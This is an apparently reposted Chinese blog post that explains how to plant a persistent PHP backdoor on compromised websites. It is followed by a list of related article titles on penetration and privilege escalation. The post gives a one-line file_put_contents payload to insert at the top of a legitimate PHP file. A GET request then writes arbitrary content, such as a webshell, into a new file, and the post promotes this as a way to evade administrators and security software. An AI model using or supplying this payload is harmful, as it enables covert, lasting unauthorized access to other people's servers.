PHP_GET后门,躲避任何安全软件
来源:互联网 发布:cad软件下载安装 编辑:程序博客网 时间:2024/05/20 11:20
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。
现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。
<?php
file_put_contents('xpxp.php',"$_GET[uname]"); //此段代码插入它正常的PHP里面,最好插头部。
复制代码利用也很简单,在插入的PHP文件的后面加入get传参,
http://xxxxxxx.com/xxx.php?uname=插入内容,随便放,可以放一句话或者神马的,发挥自己想象了。
执行以后在插入的PHP当前文件夹下面生成一个xpxp.php 。
0 0
- PHP_GET后门,躲避任何安全软件
- 软件后门
- 后门软件谈
- 给软件装后门
- 【软件后门】 PowerISO5 虚拟光驱
- 修改网络地址躲避公司网管软件
- 未发现后门:开源加密软件TrueCrypt安全审计结束
- Linux 安全之SSH后门
- 安全的使用带后门的webshell
- 什么是路由器后门?如何保护路由器安全?
- WordPress主题后门严重威胁网站安全
- PHP安全编程之留心后门URL
- PHP安全编程:留心后门URL
- 给自己的软件添加后门
- 给自己的软件添加后门
- 给自己的软件添加后门
- 【软件后门】QQ密码框 - 2010
- OSX.Mokes.a.后门恶意软件详解
- 内网渗透中的mimikatz
- Linux下中间人攻击利用框架bettercap测试
- Metasploit渗透技巧:后渗透Meterpreter代理
- PHPmyadmin拿shell总结
- MYSQL提权总结
- PHP_GET后门,躲避任何安全软件
- Mof提权科普
- VBS下载者助以一臂之力
- Thinkphp 漏洞小试
- 内网渗透之IPC,远程执行
- 域内渗透基本技巧
- Metasploit渗透技巧:后渗透Meterpreter代理
- MySQL忘记密码处理方法
- 使用Hash直接登录Windows(HASH传递)